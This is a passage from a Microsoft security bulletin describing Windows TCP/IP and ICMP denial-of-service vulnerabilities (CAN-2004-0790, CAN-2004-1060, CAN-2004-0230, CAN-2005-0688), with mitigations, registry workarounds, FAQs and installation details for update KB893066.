Control Message Protocol &#40;ICMP&#41; is a required TCP/IP standard that is defined in RFC 792, &quot;Internet Control Message Protocol &#40;ICMP&#41;.&quot; Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022\t\r\n\r\nAn IP datagram cannot reach its destination.\r\n\u2022\t\r\n\r\nAn IP router &#40;gateway&#41; cannot forward datagrams at the current rate of transmission.\r\n\u2022\t\r\n\r\nAn IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset network connections.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. By default, the Microsoft Internet Connection Firewall &#40;ICF&#41; allows these kinds of malicious network packets and cannot be used to filter them.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate ICMP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2004-0790. There is a variant of this issue that has been assigned Common Vulnerability and Exposure number CAN-2004-0791. The Microsoft security update for CAN-2004-0790 happens to also address CAN-2004-0791.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol &#40;ICMP&#41; message to an affected system that could cause network performance to degrade and potentially stop the affected system from responding to requests.\r\n\t\r\nMitigating Factors for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\u2022\t\r\n\r\nFirewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nFor an attacker to try to exploit this vulnerability, they must first predict or learn the IP address information of the source and of the destination of an existing TCP network connection.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nDisable Path MTU Discovery.\r\nDisabling Path MTU Discovery will prevent an attacker from specifying a low MTU value that could degrade network performance by following these steps:\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the &quot;Changing Keys And Values&quot; Help topic in Registry Editor &#40;Regedit.exe&#41; or view the &quot;Add and Delete Information in the Registry&quot; and &quot;Edit Registry Data&quot; Help topics in Regedt32.exe.\r\n\r\nNote We recommend backing up the registry before you edit it.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type &quot;regedt32&quot; &#40;without the quotation marks&#41;, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nIn Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;Tcpip&#92;Parameters\r\n\r\n3.\r\n\t\r\n\r\nAdd the DWORD Value: EnablePMTUDiscovery. Set the value to 0. This value disables Path MTU Discovery. By default, this key does not exist.\r\n\r\n4.\r\n\t\r\n\r\nYou must restart your system for this change to take effect.\r\n\r\nImpact of Workaround: These changes will help prevent attacks restricting the ability of an attacker to reduce the Path MTU value to a low value. This setting can also negatively impact performance by preventing TCP from optimizing network communication. This optimization can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion. For more information about EnablePMTUDiscovery, see the following Web site.\r\n\u2022\t\r\n\r\nBlock all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are used to initiate a connection with the affected components. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet. ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\u2022\t\r\n\r\nBlock ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security &#40;IPSec&#41; to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol &#40;ICMP&#41; message to an affected system that could cause network performance to degrade and potentially stop the affected system from responding to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nThe ICMP Path MTU Discovery process allows an attacker to specify a Path MTU value that can degrade network performance.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet Control Message Protocol &#40;ICMP&#41; is a required TCP/IP standard that is defined in RFC 792, &quot;Internet Control Message Protocol &#40;ICMP&#41;.&quot; Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022\t\r\n\r\nAn IP datagram cannot reach its destination.\r\n\u2022\t\r\n\r\nAn IP router &#40;gateway&#41; cannot forward datagrams at the current rate of transmission.\r\n\u2022\t\r\n\r\nAn IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat is Path MTU Discovery?\r\nPath maximum transmission unit &#40;PMTU&#41; discovery is the process of discovering the maximum size of packet that can be sent across the network between two hosts without fragmentation &#40;that is, without the packet being broken into multiple frames during transmission&#41;. It is described in RFC 1191. For more information, see RFC 1191. For additional information, see the following MSDN Web site.\r\n\r\nWhat is wrong with the Path MTU Discovery process?\r\nPath maximum transmission unit &#40;PMTU&#41; discovery allows an attacker to specify a value that can degrade network performance for other connections. On unsecured networks, allowing PMTU discovery carries the risk that an attacker might force the MTU to a very small value and overwork the local system&#39;s TCP/IP stack. Normally this behavior would be restricted to the single connection that an attacker could establish. However, this vulnerability allows an attacker to modify the MTU value on other connections beyond their own connection to the affected system.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to degrade network performance.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to degrade network performance.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to performance degradation.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. By default, the Microsoft Internet Connection Firewall &#40;ICF&#41; allows these kinds of malicious network packets and cannot be used to filter them.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by restricting the minimum value of the MTU to 576 bytes. This update also modifies the way that the affected operating systems validate ICMP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2004-1060.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nTCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections.\r\n\t\r\nMitigating Factors for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\u2022\t\r\n\r\nFor an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or to learn certain difficult TCP network packet details. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any TCP connections to the Internet may be vulnerable to this issue.\r\n\u2022\t\r\n\r\nThis attack would have to be performed on each TCP connection that was targeted for reset. Many applications will automatically restore connections that have been reset.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nWe have not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections. Those connections would have to be reestablished for normal communication to continue. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nThe affected messages are not being ignored in certain cases that allow an attacker to send a malformed TCP packet which may cause the reset of an existing connection.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system and learn or predict the required TCP details could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP connections.\r\n\r\nFor an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or learn certain difficult TCP network packet details.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2004-0230.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the proof of concept code that has been publicly published. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CAN-2004-0230.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSpoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP/IP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to stop responding.\r\n\t\r\nMitigating Factors for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\u2022\t\r\n\r\nThe affected system would function as normal after the malicious packets are finished processing.\r\n\u2022\t\r\n\r\nThis attack requires that routers forward malformed TCP/IP network packets. Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\n\u2022\t\r\n\r\nWindows Server 2003 systems that have enabled the SynAttackProtect registry value are not vulnerable to this issue. For information on how to enable this registry value, see the \u201cWorkarounds\u201d section of this vulnerability. This registry value does not protect other affected operating systems.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\u2022\t\r\n\r\nISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic. Please review the ISA Server Preventative Measures Documentation for more information on how to use ISA Server to help mitigate this vulnerability.\r\n\u2022\t\r\n\r\nEnabling the SynAttackProtect registry value on Windows Sever 2003 will mitigate this vulnerability. Windows Server 2003 systems that have enabled this registry value are not vulnerable to this issue. Microsoft recommends that customers enable this registry value. For information on how to enable this registry value, see the following Microsoft Web site. This registry value does not protect other affected operating systems.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding for a limited time. During that time, affected systems cannot respond to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of TCP/IP network packets. This vulnerability occurs when a Transmission Control Protocol &#40;TCP&#41; SYN packet is received with a spoofed source Internet Protocol &#40;IP&#41; address and port number that is identical to that of the destination IP address and port. The effect of this makes it appear that the host computer has sent a packet to itself. If this attack is successful, a loop is created and extra computer CPU time is used.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWindows XP Service Pack 2 and Windows Server 2003 are primarily at risk from this vulnerability. Prior operating system versions are not vulnerable to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. However, this attack requires that routers forward malformed TCP/IP network packets. Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP/IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2005-0688. It also has been named \u201cLand Attack\u201d by the larger security community.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is demonstrated by the existing proof of concept code that has been published.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSecurity Update Information\r\n\r\nAffected Software:\r\n\r\nFor information about the specific security update for your affected software, click the appropriate link:\r\n\t\r\nWindows Server 2003 &#40;all versions&#41;\r\n\r\nPrerequisites\r\nThis security update requires a release version of Windows Server 2003.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue is included in Windows Server 2003 Service Pack 1.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrite OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDo not backup files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllow the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files located at the path specified\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnable extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates &#37;Windir&#37;&#92;CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb893066-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the &#37;Windir&#37;&#92;$NTUninstallKB893066$&#92;Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes \t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; and Windows Small Business Server 2003:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n05:04\r\n\t\r\n\r\n335,360\r\n\t\r\n\r\nRTMGDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n05:03\r\n\t\r\n\r\n336,896\r\n\t\r\n\r\nRTMQFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n03:51\r\n\t\r\n\r\n371,936\r\n\t\r\n\r\nWindows Server 2003, Enterprise Edition for Itanium-based Systems and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n973,824\r\n\t\r\n\r\nRTMGDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n977,408\r\n\t\r\n\r\nRTMQFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n11-Mar-2005\r\n\t\r\n\r\n17:56\r\n\t\r\n\r\n639,712\r\n\t\r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Enterprise Edition for Itanium-based Systems; and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows Server 2003&#92;SP1&#92;KB893066&#92;Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\n\r\n\t\r\nWindows XP &#40;all versions&#41;\r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows XP Service Pack 1 or a later version. For more information, see Microsoft Knowledge Base Article 322389.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrite OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDo not backup files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllow the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files located at the path specified\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnable extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates &#37;Windir&#37;&#92;CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Microsoft Windows XP:\r\n\r\nWindowsxp-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP:\r\n\r\nWindowsxp-kb893066-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the &#37;Windir&#37;&#92;$NTUninstallKB893066$&#92;Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes \t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 